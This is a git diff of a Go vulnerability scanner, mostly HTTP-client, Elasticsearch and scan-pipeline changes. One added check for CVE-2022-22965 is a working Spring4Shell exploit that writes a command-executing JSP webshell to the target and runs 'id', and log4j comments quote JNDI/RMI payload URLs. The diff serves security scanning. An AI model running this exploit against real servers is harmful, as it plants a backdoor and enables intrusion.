TestIs404(szUrl string) (r01 *Response, err error, ok bool) { // } //} r01, err = HttpRequset(sz404, "GET", "", false, mh1) - ok = err == nil && nil != r01 && 404 == r01.StatusCode + ok = err == nil && nil != r01 && (200 <= r01.StatusCode) if nil != err { CloseHttpClient(sz404) - //log.Println(sz404, err) + log.Println(sz404, err) } else { //log.Printf("%d %s %s\n", r01.StatusCode, r01.Protocol, sz404) } diff --git a/lib/util/sv2es.go b/lib/util/sv2es.go index 67ffa7ccf..a7ec9452e 100644 --- a/lib/util/sv2es.go +++ b/lib/util/sv2es.go @@ -6,6 +6,8 @@ import ( "encoding/hex" "encoding/json" "fmt" + "github.com/hktalent/goSqlite_gorm/lib/scan/Const" + "github.com/hktalent/goSqlite_gorm/pkg/models" "io/ioutil" "log" "net/http" @@ -27,6 +29,15 @@ func initEs() { } } +func init() { + RegInitFunc(func() { + // 保存数据也采用统一的线程池 + EngineFuncFactory(Const.ScanType_SaveEs, func(evt *models.EventData, args ...interface{}) { + SendReq(args[0].(interface{}), args[1].(string), args[2].(ESaveType)) + }) + }) +} + func Log(v ...any) { log.Println(v...) } @@ -44,15 +55,15 @@ type SimpleVulResult struct { // 一定得有全局得线程等待 func SendAnyData(data interface{}, szType ESaveType) { - DoSyncFunc(func() { + if enableEsSv { data1, _ := json.Marshal(data) - if 0 < len(data1) && enableEsSv { + if 0 < len(data1) { hasher := sha1.New() hasher.Write(data1) k := hex.EncodeToString(hasher.Sum(nil)) - SendReq(data, k, szType) + SendEvent(&models.EventData{EventType: Const.ScanType_SaveEs, EventData: []interface{}{data, k, szType}}, Const.ScanType_SaveEs) } - }) + } } // k is id @@ -60,49 +71,49 @@ func SendAData[T any](k string, data []T, szType ESaveType) { if 0 < len(data) && enableEsSv { m2 := make(map[string]interface{}) m2[k] = data - SendReq(m2, k, szType) - log.Printf("%+v\n", data) + SendEvent(&models.EventData{EventType: Const.ScanType_SaveEs, EventData: []interface{}{m2, k, szType}}, Const.ScanType_SaveEs) + //SendReq(m2, k, szType) + //log.Printf("%+v\n", data) } } +// es 需要基于buffer,避免太频繁 // 发送数据到ES // data1数据 // id 数据计算出来的id // szType 类型,决定 es不通的索引分类 func SendReq(data1 interface{}, id string, szType ESaveType) { - DoSyncFunc(func() { - if !enableEsSv { - return - } - //log.Println("enableEsSv = ", enableEsSv, " id= ", id, " type = ", szType) - nThreads <- struct{}{} - defer func() { - <-nThreads - }() - szUrl := fmt.Sprintf(EsUrl, szType, url.QueryEscape(id)) - //log.Println("logs EsUrl = ", EsUrl) - m1 := map[string]string{ - "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15", - "Content-Type": "application/json;charset=UTF-8", - } - c1 := GetClient(szUrl, map[string]interface{}{"UseHttp2": true}) - c1.ErrLimit = 10000 - c1.ErrCount = 0 - data, _ := json.Marshal(data1) - c1.DoGetWithClient4SetHd(c1.GetClient4Http2(), szUrl, "POST", bytes.NewReader(data), func(resp *http.Response, err error, szU string) { - if nil != err { - log.Println("pphLog.DoGetWithClient4SetHd ", err) - } else { - defer resp.Body.Close() - body, err := ioutil.ReadAll(resp.Body) - if nil == err && 0 < len(body) { - Log("Es save result ", string(body)) - } else if nil != err { - Log(err) - } + if !enableEsSv { + return + } + //log.Println("enableEsSv = ", enableEsSv, " id= ", id, " type = ", szType) + nThreads <- struct{}{} + defer func() { + <-nThreads + }() + szUrl := fmt.Sprintf(EsUrl, szType, url.QueryEscape(id)) + //log.Println("logs EsUrl = ", EsUrl) + m1 := map[string]string{ + "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15", + "Content-Type": "application/json;charset=UTF-8", + } + c1 := GetClient(szUrl, map[string]interface{}{"UseHttp2": true}) + c1.ErrLimit = 10000 + c1.ErrCount = 0 + data, _ := json.Marshal(data1) + c1.DoGetWithClient4SetHd(c1.GetClient4Http2(), szUrl, "POST", bytes.NewReader(data), func(resp *http.Response, err error, szU string) { + if nil != err { + log.Println("pphLog.DoGetWithClient4SetHd ", err) + } else { + defer resp.Body.Close() + body, err := ioutil.ReadAll(resp.Body) + if nil == err && 0 < len(body) { + Log("Es save result ", string(body)) + } else if nil != err { + Log(err) } - }, func() map[string]string { - return m1 - }, true) - }) + } + }, func() map[string]string { + return m1 + }, true) } diff --git a/lib/util/util.go b/lib/util/util.go index 632669fdf..abb3468fc 100644 --- a/lib/util/util.go +++ b/lib/util/util.go @@ -79,7 +79,8 @@ func GetClient4Cc(szUrl string) *PipelineHttp.PipelineHttp { InitCHcc() oU, err := url.Parse(szUrl) if nil == err { - if o := clientHttpCc.Get(oU.Scheme + oU.Host); nil != o { + // if o := clientHttpCc.Get(oU.Scheme + oU.Host); nil != o { + if o := clientHttpCc.Get("_ccClient"); nil != o && oU.Hostname() != "" { if v, ok := o.Value().(*PipelineHttp.PipelineHttp); ok { return v } @@ -125,7 +126,9 @@ func GetClient(szUrl string, pms ...map[string]interface{}) *PipelineHttp.Pipeli //client.Client = G_hc mUrls.Store(oU.Host, "") clientHttpCc.Delete(oU.Scheme + oU.Host) - clientHttpCc.Set(oU.Scheme+oU.Host, client, defaultInteractionDuration) + //clientHttpCc.Set(oU.Scheme+oU.Host, client, defaultInteractionDuration) + clientHttpCc.Set("_ccClient", client, defaultInteractionDuration) + return client } @@ -242,7 +245,7 @@ func HttpRequset(urlstring string, method string, postdata string, isredirect bo func TestIsWeb(a *[]string) (a1 *[]string, b *[]string) { var aHttp, noHttp []string for _, k := range *a { - if _, _, ok := TestIs404(k); ok { + if _, _, ok := TestIsWeb01(k); ok { aHttp = append(aHttp, k) } else { noHttp = append(noHttp, k) diff --git a/main.go b/main.go index ea3cc2584..18ceba5f6 100644 --- a/main.go +++ b/main.go @@ -21,7 +21,7 @@ var config embed.FS var Version string func main() { - //os.Args = []string{"", "-host", "http://192.168.0.109", "-v"} + //os.Args = []string{"", "-host", "http://192.168.10.203", "-v"} //os.Args = []string{"", "-host", "http://127.0.0.1", "-v"} //os.Args = []string{"", "-host", "https://www.sina.com.cn/", "-v", "-o", "xxx.csv"} //os.Args = []string{"", "-list", "list.txt", "-v"} diff --git a/pkg/hydra/doNmapResult.go b/pkg/hydra/doNmapResult.go index 9f2eb034e..63366a237 100644 --- a/pkg/hydra/doNmapResult.go +++ b/pkg/hydra/doNmapResult.go @@ -59,8 +59,11 @@ func DoParseXml(s string, bf *bytes.Buffer) { for _, x := range hostName { aDns = append(aDns, GetAttr(x.Attr, "name")) } - x1 := n.SelectElement("address").Attr[0].Value + if 0 == len(aDns) { + aDns = append(aDns, x1) + } + ps := n.SelectElements("ports/port") for _, x := range ps { if "open" == x.SelectElement("state").Attr[0].Value { diff --git a/pkg/naabu/v2/pkg/runner/targets.go b/pkg/naabu/v2/pkg/runner/targets.go index d06c0b828..68f2972ad 100644 --- a/pkg/naabu/v2/pkg/runner/targets.go +++ b/pkg/naabu/v2/pkg/runner/targets.go @@ -208,6 +208,7 @@ func (r *Runner) DoTargets() (bool, error) { }(x99[0]) } util.TmpFile[string(util.Naabu)] = []*os.File{tempInput1} + log.Println("start parse nmap xml result") hydra.DoNmapRst(&Naabubuffer) defer r.Close() if "" != r.targetsFile { diff --git a/pocs_go/Springboot/CVE-2022-22965.go b/pocs_go/Springboot/CVE-2022-22965.go index 55aaf7d93..6b7fe0d73 100644 --- a/pocs_go/Springboot/CVE-2022-22965.go +++ b/pocs_go/Springboot/CVE-2022-22965.go @@ -1,7 +1,10 @@ package Springboot import ( + "github.com/hktalent/ProScan4all/lib/socket" "github.com/hktalent/ProScan4all/lib/util" + "net/url" + "strings" ) func CVE_2022_22965(u string) bool { @@ -14,5 +17,29 @@ func CVE_2022_22965(u string) bool { } } } + if oU, err := url.Parse(u); nil == err && oU.Host != "" { + cc := socket.NewCheckTarget(u, "tcp", 50) + cc.SendPayload([]byte(strings.ReplaceAll(`GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1 +Host: `+oU.Host+` +Accept-Encoding: gzip, deflate +Accept-Language: en +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 +Connection: close +suffix: %>// +c1: Runtime +c2: <% +DNT: 1 + +`, "\n", "\r\n")), 1) + s1 := cc.SendPayload([]byte(strings.ReplaceAll(`GET /tomcatwar.jsp?pwd=j&cmd=id HTTP/1.1 +Host: `+oU.Host+` +Connection: close + +`, "\n", "\r\n")), 1) + if strings.Contains(s1, "uid=") && strings.Contains(s1, "gid=") { + util.SendLog(oU.Scheme+"://"+oU.Host+"/tomcatwar.jsp?pwd=j&cmd=id", "Springboot", "RCE", "") + return true + } + } return false } diff --git a/pocs_go/log4j/check.go b/pocs_go/log4j/check.go index b57793304..8a2f9c393 100644 --- a/pocs_go/log4j/check.go +++ b/pocs_go/log4j/check.go @@ -9,7 +9,10 @@ import ( "strings" ) +// https://github.com/u21h2/nacs // https://192.168.10.198/ui/#/login +// http://127.0.0.1:8983/solr/admin/cores?action=(){:;}{$:;$}{jndi:rmi${{::-:}}}//docker.for.mac.localhost:1099/UpX34defineClass} +// http://127.0.0.1:8983/solr/admin/cores?action=${jndi:${rmi://docker.for.mac.localhost:1099/UpX34defineClass}} var UrlPayload = []string{"/solr/admin/cores?action=${jndi:%s}"} var RegVCenter = regexp.MustCompile(`(http.*?\?SAMLRequest=)`) diff --git a/projectdiscovery/nuclei_Yaml/nuclei_yaml.go b/projectdiscovery/nuclei_Yaml/nuclei_yaml.go index c2c6f5a45..2f74a7126 100644 --- a/projectdiscovery/nuclei_Yaml/nuclei_yaml.go +++ b/projectdiscovery/nuclei_Yaml/nuclei_yaml.go @@ -137,8 +137,10 @@ func RunNuclei(buf *bytes.Buffer, xx chan bool, oOpts *map[string]interface{}, o readConfig(options) s001 := strings.TrimSpace(buf.String()) - options.Targets = strings.Split(s001, "\n") - log.Printf("options.Targets = %+v", options.Targets) + a66 := strings.Split(s001, "\n") + x55, _ := util.TestIsWeb(&a66) + options.Targets = *x55 + log.Printf("nuclei options.Targets = %+v\n", options.Targets) ///////////////////////////////////// options.Verbose = false options.UpdateNuclei = false diff --git a/vendor/github.com/hktalent/PipelineHttp/PipelineHttp.go b/vendor/github.com/hktalent/PipelineHttp/PipelineHttp.go index b9b9a05c3..866115130 100644 --- a/vendor/github.com/hktalent/PipelineHttp/PipelineHttp.go +++ b/vendor/github.com/hktalent/PipelineHttp/PipelineHttp.go @@ -16,6 +16,9 @@ import ( "time" ) +/* +MaxConnsPerHost 控制单个Host的最大连接总数,该值默认是0,也就是不限制,连接池里的连接能用就用,不能用创建新连接 +*/ type PipelineHttp struct { Timeout time.Duration `json:"timeout"` KeepAlive time.Duration `json:"keep_alive"` @@ -54,7 +57,7 @@ func NewPipelineHttp(args ...map[string]interface{}) *PipelineHttp { TLSHandshakeTimeout: time.Duration(nTimeout) * time.Second, // TLSHandshakeTimeout specifies the maximum amount of time waiting to wait for a TLS handshake. Zero means no timeout. ExpectContinueTimeout: 0, // 零表示没有超时,并导致正文立即发送,无需等待服务器批准 MaxIdleConnsPerHost: nIdle, // MaxIdleConnsPerHost, if non-zero, controls the maximum idle (keep-alive) connections to keep per-host. If zero, DefaultMaxIdleConnsPerHost is used. - MaxConnsPerHost: nIdle, // + MaxConnsPerHost: 0, // 控制单个Host的最大连接总数,该值默认是0,也就是不限制,连接池里的连接能用就用,不能用创建新连接 ErrLimit: 10, // 相同目标,累计错误10次就退出 ErrCount: 0, IsClosed: false, @@ -84,7 +87,7 @@ func NewPipelineHttp(args ...map[string]interface{}) *PipelineHttp { func (r *PipelineHttp) Dial(ctx context.Context, network, addr string) (conn net.Conn, err error) { for i := 0; i < r.ReTry; i++ { conn, err = (&net.Dialer{ - Timeout: r.Timeout, + //Timeout: r.Timeout, KeepAlive: r.KeepAlive, //Control: r.Control, DualStack: true, @@ -117,15 +120,15 @@ func (r *PipelineHttp) GetTransport() http.RoundTripper { DialContext: r.Dial, TLSClientConfig: &tls.Config{InsecureSkipVerify: true, MinVersion: tls.VersionTLS10, Renegotiation: tls.RenegotiateOnceAsClient}, //ForceAttemptHTTP2: true, // 不能加 - MaxResponseHeaderBytes: 4096, //net/http default is 10Mb - DisableKeepAlives: false, // false 才会复用连接 https://blog.csdn.net/qq_21514303/article/details/87794750 - MaxIdleConns: r.MaxIdleConns, // 是长连接在关闭之前,连接池对所有host的最大链接数量 - IdleConnTimeout: r.IdleConnTimeout, // 连接最大空闲时间,超过这个时间就会被关闭 - TLSHandshakeTimeout: r.TLSHandshakeTimeout, // 限制TLS握手使用的时间 - ExpectContinueTimeout: r.ExpectContinueTimeout, // 限制客户端在发送一个包含:100-continue的http报文头后,等待收到一个go-ahead响应报文所用的时间。在1.6中,此设置对HTTP/2无效。(在1.6.2中提供了一个特定的封装DefaultTransport) - MaxIdleConnsPerHost: r.MaxIdleConnsPerHost, // 连接池对每个host的最大链接数量(MaxIdleConnsPerHost <= MaxIdleConns,如果客户端只需要访问一个host,那么最好将MaxIdleConnsPerHost与MaxIdleConns设置为相同,这样逻辑更加清晰) - MaxConnsPerHost: r.MaxConnsPerHost, - ResponseHeaderTimeout: r.ResponseHeaderTimeout, // 限制读取响应报文头使用的时间 + //MaxResponseHeaderBytes: 4096, //net/http default is 10Mb + DisableKeepAlives: false, // false 才会复用连接 https://blog.csdn.net/qq_21514303/article/details/87794750 + //MaxIdleConns: r.MaxIdleConns, // 是长连接在关闭之前,连接池对所有host的最大链接数量 + //IdleConnTimeout: r.IdleConnTimeout, // 连接最大空闲时间,超过这个时间就会被关闭 + //TLSHandshakeTimeout: r.TLSHandshakeTimeout, // 限制TLS握手使用的时间 + //ExpectContinueTimeout: r.ExpectContinueTimeout, // 限制客户端在发送一个包含:100-continue的http报文头后,等待收到一个go-ahead响应报文所用的时间。在1.6中,此设置对HTTP/2无效。(在1.6.2中提供了一个特定的封装DefaultTransport) + //MaxIdleConnsPerHost: r.MaxIdleConnsPerHost, // 连接池对每个host的最大链接数量(MaxIdleConnsPerHost <= MaxIdleConns,如果客户端只需要访问一个host,那么最好将MaxIdleConnsPerHost与MaxIdleConns设置为相同,这样逻辑更加清晰) + //MaxConnsPerHost: r.MaxConnsPerHost, + //ResponseHeaderTimeout: r.ResponseHeaderTimeout, // 限制读取响应报文头使用的时间 } return tr } @@ -136,7 +139,7 @@ func (r *PipelineHttp) GetClient(tr http.RoundTripper) *http.Client { } c := &http.Client{ Transport: tr, - Timeout: r.Timeout, // 超时为零表示没有超时 + //Timeout: r.Timeout, // 超时为零表示没有超时 CheckRedirect: func(req *http.Request, via []*http.Request) error { return http.ErrUseLastResponse /* 不进入重定向 */ }, @@ -225,15 +228,17 @@ func (r *PipelineHttp) DoGetWithClient4SetHd(client *http.Client, szUrl string, r.Close() return } - if !r.UseHttp2 && nil != resp && resp.StatusCode == http.StatusSwitchingProtocols { - if resp != nil { - r.CloseResponse(resp) - } + if !r.UseHttp2 && nil != resp { r.UseHttp2 = true - r.Client = r.GetRawClient4Http2() + if a1 := resp.Header["Alt-Svc"]; 0 < len(a1) && strings.Contains(a1[0], "h3=\"") || strings.HasPrefix(resp.Proto, "HTTP/3") { + r.Client = r.GetClient4Http3() + } else if resp.StatusCode == http.StatusSwitchingProtocols { + r.Client = r.GetRawClient4Http2() + } oU7, _ := url.Parse(szUrl) szUrl09 := "https://" + oU7.Host + oU7.Path r.ErrLimit = 99999999 + r.CloseResponse(resp) r.DoGetWithClient4SetHd(r.Client, szUrl09, method, postBody, fnCbk, setHd, bCloseBody) return } @@ -263,14 +268,23 @@ func (r *PipelineHttp) testHttp2(szUrl001 string) { r.UseHttp2 = true c1 := r.GetRawClient4Http2() oU7, _ := url.Parse(szUrl001) + if "" == oU7.Path { + oU7.Path = "/" + } szUrl09 := "https://" + oU7.Host + oU7.Path r.DoGetWithClient(c1, szUrl09, "GET", nil, func(resp *http.Response, err error, szU string) { - if nil != resp && (strings.HasPrefix(resp.Proto, "HTTP/2") || strings.HasPrefix(resp.Proto, "HTTP/3") || resp.StatusCode == http.StatusSwitchingProtocols) { - r.CloseResponse(resp) - if nil != r.Client { - r.Client.CloseIdleConnections() + if nil != resp { + if resp.StatusCode == http.StatusSwitchingProtocols { + r.CloseResponse(resp) + if nil != r.Client { + r.Client.CloseIdleConnections() + } + if strings.HasPrefix(resp.Proto, "HTTP/2") { + r.Client = c1 + } + } else if a1 := resp.Header["Alt-Svc"]; 0 < len(a1) && strings.Contains(a1[0], "h3=\"") { + r.Client = r.GetClient4Http3() } - r.Client = c1 r.ErrLimit = 99999999 } else { r.UseHttp2 = false diff --git a/vendor/github.com/hktalent/PipelineHttp/http3client.go b/vendor/github.com/hktalent/PipelineHttp/http3client.go index ee23815e5..d5392390d 100644 --- a/vendor/github.com/hktalent/PipelineHttp/http3client.go +++ b/vendor/github.com/hktalent/PipelineHttp/http3client.go @@ -8,6 +8,7 @@ import ( "net/http" ) +// 在线测试http3 https://geekflare.com/tools/http3-test func (r *PipelineHttp) GetTransport4Http3() http.RoundTripper { pool, err := x509.SystemCertPool() if nil != err { diff --git a/vendor/github.com/hktalent/goSqlite_gorm/lib/doTask.go b/vendor/github.com/hktalent/goSqlite_gorm/lib/doTask.go index d912ddc9f..b0ef1f1e0 100644 --- a/vendor/github.com/hktalent/goSqlite_gorm/lib/doTask.go +++ b/vendor/github.com/hktalent/goSqlite_gorm/lib/doTask.go @@ -139,6 +139,6 @@ func SaveRsult4Ws(id string, m11 *map[string]interface{}, g1 *gin.Context, h *Hu log.Println(szE01) } } else { - log.Printf("vuls info cannot found event") + log.Printf("vuls info cannot found event: %+v", *m11) } } diff --git a/vendor/github.com/hktalent/goSqlite_gorm/lib/scan/Const/ScanType.go b/vendor/github.com/hktalent/goSqlite_gorm/lib/scan/Const/ScanType.go index 572e52458..79e508f91 100644 --- a/vendor/github.com/hktalent/goSqlite_gorm/lib/scan/Const/ScanType.go +++ b/vendor/github.com/hktalent/goSqlite_gorm/lib/scan/Const/ScanType.go @@ -20,6 +20,8 @@ const ( ScanType_WebDirScan // 14- dir爆破,Gobuster ScanType_Naabu // 15- naabu ScanType_Httpx // 16- httpx + ScanType_DNSx // 17- DNSX + ScanType_SaveEs // 18- Save Es ) const ( diff --git a/vendor/github.com/hktalent/goSqlite_gorm/lib/syncRsultAPI.go b/vendor/github.com/hktalent/goSqlite_gorm/lib/syncRsultAPI.go index 33478289a..9cd03010c 100644 --- a/vendor/github.com/hktalent/goSqlite_gorm/lib/syncRsultAPI.go +++ b/vendor/github.com/hktalent/goSqlite_gorm/lib/syncRsultAPI.go @@ -4,6 +4,7 @@ import ( "fmt" "github.com/gin-gonic/gin" util "github.com/hktalent/go-utils" + "github.com/hktalent/goSqlite_gorm/pkg/es7" "log" "net/http" "strconv" @@ -39,6 +40,8 @@ func A2s(o interface{}) string { return "" } +var xes = es7.NewEs7() + // 保存任务结果 func SaveRsult(g *gin.Context) { id := g.Param("id") // task id @@ -53,7 +56,11 @@ func SaveRsult(g *gin.Context) { return } if 0 < len(m11) { - SaveRsult4Ws(id, &m11, g, nil, nil) + s := xes.Create(m11, id) + if "" != s { + fmt.Println("xes.Create" + s) + } + //SaveRsult4Ws(id, &m11, g, nil, nil) } else { g.JSON(200, "ok") } diff --git a/vendor/github.com/projectdiscovery/naabu/v2/pkg/runner/options.go b/vendor/github.com/projectdiscovery/naabu/v2/pkg/runner/options.go index 26561311b..3186411b1 100644 --- a/vendor/github.com/projectdiscovery/naabu/v2/pkg/runner/options.go +++ b/vendor/github.com/projectdiscovery/naabu/v2/pkg/runner/options.go @@ -84,7 +84,7 @@ type Options struct { type OnResultCallback func(*result.HostResult) // ParseOptions parses the command line flags provided by a user -func ParseOptions(args ...string) *Options { +func ParseOptions() *Options { options := &Options{} flagSet := goflags.NewFlagSet() @@ -171,11 +171,7 @@ func ParseOptions(args ...string) *Options { flagSet.IntVarP(&options.StatsInterval, "stats-interval", "si", DefautStatsInterval, "number of seconds to wait between showing a statistics update"), ) - if 0 < len(args) { - _ = flagSet.CommandLine.Parse(args) - } else { - _ = flagSet.Parse() - } + _ = flagSet.Parse() if options.HealthCheck { gologger.Print().Msgf("%s\n", DoHealthCheck(options)) diff --git a/vendor/github.com/projectdiscovery/naabu/v2/pkg/runner/runner.go b/vendor/github.com/projectdiscovery/naabu/v2/pkg/runner/runner.go index 1de19a61d..1f187c770 100644 --- a/vendor/github.com/projectdiscovery/naabu/v2/pkg/runner/runner.go +++ b/vendor/github.com/projectdiscovery/naabu/v2/pkg/runner/runner.go @@ -46,7 +46,6 @@ type Runner struct { dnsclient *dnsx.DNSX stats *clistats.Statistics streamChannel chan *net.IPNet - OutCbk func(out ...interface{}) } // NewRunner creates a new runner struct instance by parsing @@ -691,9 +690,6 @@ func (r *Runner) handleOutput(scanResults *result.Result) { } } } - if nil != r.OutCbk { - r.OutCbk(host, hostResult.IP, hostResult.Ports, isCDNIP, cdnName) - } // file output if file != nil { if r.options.JSON { @@ -748,9 +744,6 @@ func (r *Runner) handleOutput(scanResults *result.Result) { gologger.Silent().Msgf("%s\n", host) } } - if nil != r.OutCbk { - r.OutCbk(host, hostIP, nil, isCDNIP, cdnName) - } // file output if file != nil { if r.options.JSON { diff --git a/vendor/modules.txt b/vendor/modules.txt index 1f3be23a1..34a095a97 100644 --- a/vendor/modules.txt +++ b/vendor/modules.txt @@ -75,12 +75,16 @@ github.com/ammario/ipisp/v2 # github.com/andres-erbsen/clock v0.0.0-20160526145045-9e14626cd129 ## explicit github.com/andres-erbsen/clock +# github.com/andybalholm/brotli v1.0.4 +## explicit; go 1.12 # github.com/andybalholm/cascadia v1.3.1 ## explicit; go 1.16 github.com/andybalholm/cascadia # github.com/andygrunwald/go-jira v1.16.0 ## explicit; go 1.15 github.com/andygrunwald/go-jira +# github.com/anmitsu/go-shlex v0.0.0-20200514113438-38f4b401e2be +## explicit; go 1.13 # github.com/antchfx/htmlquery v1.2.5 ## explicit; go 1.14 github.com/antchfx/htmlquery @@ -290,6 +294,8 @@ github.com/corpix/uarand # github.com/cpuguy83/go-md2man/v2 v2.0.2 ## explicit; go 1.11 github.com/cpuguy83/go-md2man/v2/md2man +# github.com/creack/pty v1.1.18 +## explicit; go 1.13 # github.com/davecgh/go-spew v1.1.1 ## explicit github.com/davecgh/go-spew/spew @@ -316,6 +322,8 @@ github.com/dgraph-io/badger/y ## explicit; go 1.12 github.com/dgraph-io/ristretto/z github.com/dgraph-io/ristretto/z/simd +# github.com/dgrijalva/jwt-go v3.2.0+incompatible +## explicit # github.com/dimchansky/utfbom v1.1.1 ## explicit github.com/dimchansky/utfbom @@ -334,9 +342,17 @@ github.com/dsnet/compress/bzip2/internal/sais github.com/dsnet/compress/internal github.com/dsnet/compress/internal/errors github.com/dsnet/compress/internal/prefix +# github.com/dustin/go-broadcast v0.0.0-20211018055107-71439988bd91 +## explicit; go 1.16 # github.com/dustin/go-humanize v1.0.0 ## explicit github.com/dustin/go-humanize +# github.com/elastic/go-elasticsearch/v7 v7.17.1 +## explicit; go 1.11 +github.com/elastic/go-elasticsearch/v7 +github.com/elastic/go-elasticsearch/v7/esapi +github.com/elastic/go-elasticsearch/v7/estransport +github.com/elastic/go-elasticsearch/v7/internal/version # github.com/emersion/go-message v0.16.0 ## explicit; go 1.14 github.com/emersion/go-message @@ -358,9 +374,13 @@ github.com/getsentry/sentry-go github.com/getsentry/sentry-go/internal/crypto/randutil github.com/getsentry/sentry-go/internal/debug github.com/getsentry/sentry-go/internal/ratelimit +# github.com/gin-contrib/gzip v0.0.5 +## explicit; go 1.13 # github.com/gin-contrib/sse v0.1.0 ## explicit; go 1.12 github.com/gin-contrib/sse +# github.com/gin-contrib/static v0.0.1 +## explicit; go 1.15 # github.com/gin-gonic/gin v1.8.1 ## explicit; go 1.18 github.com/gin-gonic/gin @@ -368,6 +388,8 @@ github.com/gin-gonic/gin/binding github.com/gin-gonic/gin/internal/bytesconv github.com/gin-gonic/gin/internal/json github.com/gin-gonic/gin/render +# github.com/gliderlabs/ssh v0.3.4 +## explicit; go 1.12 # github.com/go-ole/go-ole v1.2.6 ## explicit; go 1.12 github.com/go-ole/go-ole @@ -573,17 +595,21 @@ github.com/hbakhtiyor/strsim # github.com/hdm/jarm-go v0.0.7 ## explicit; go 1.15 github.com/hdm/jarm-go -# github.com/hktalent/PipelineHttp v0.0.0-20221007051907-72402204b668 +# github.com/hktalent/PipelineHttp v0.0.0-20221013012646-f1b33c0f6f66 ## explicit; go 1.18 github.com/hktalent/PipelineHttp # github.com/hktalent/go-utils v0.0.0-20221004095234-2e23f13b429d ## explicit; go 1.18 github.com/hktalent/go-utils -# github.com/hktalent/goSqlite_gorm v1.1.3 +# github.com/hktalent/go4Hacker v0.0.0-20220610050413-bb38dc39c4b9 +## explicit; go 1.17 +# github.com/hktalent/goSqlite_gorm v1.1.4 ## explicit; go 1.18 github.com/hktalent/goSqlite_gorm/lib github.com/hktalent/goSqlite_gorm/lib/scan/Const +github.com/hktalent/goSqlite_gorm/pkg/es7 github.com/hktalent/goSqlite_gorm/pkg/models +github.com/hktalent/goSqlite_gorm/pkg/util # github.com/hktalent/jarm-go v0.0.0-20220918133110-7801447b6267 ## explicit; go 1.18 github.com/hktalent/jarm-go @@ -664,8 +690,6 @@ github.com/jcmturner/gokrb5/v8/types ## explicit; go 1.13 github.com/jcmturner/rpc/v2/mstypes github.com/jcmturner/rpc/v2/ndr -# github.com/jinzhu/copier v0.3.5 -## explicit; go 1.13 # github.com/jinzhu/inflection v1.0.0 ## explicit github.com/jinzhu/inflection @@ -765,6 +789,8 @@ github.com/mailru/easyjson github.com/mailru/easyjson/buffer github.com/mailru/easyjson/jlexer github.com/mailru/easyjson/jwriter +# github.com/manucorporat/stats v0.0.0-20180402194714-3ba42d56d227 +## explicit # github.com/marten-seemann/qpack v0.2.1 ## explicit; go 1.14 github.com/marten-seemann/qpack @@ -1177,6 +1203,8 @@ github.com/remeh/sizedwaitgroup # github.com/rivo/uniseg v0.4.2 ## explicit; go 1.18 github.com/rivo/uniseg +# github.com/robfig/cron v1.2.0 +## explicit # github.com/rogpeppe/go-internal v1.9.0 ## explicit; go 1.17 github.com/rogpeppe/go-internal/fmtsort @@ -1323,6 +1351,8 @@ github.com/ulikunitz/xz/lzma # github.com/ulule/deepcopier v0.0.0-20200430083143-45decc6639b6 ## explicit; go 1.14 github.com/ulule/deepcopier +# github.com/unrolled/secure v1.10.0 +## explicit; go 1.13 # github.com/urfave/cli/v2 v2.16.3 ## explicit; go 1.18 github.com/urfave/cli/v2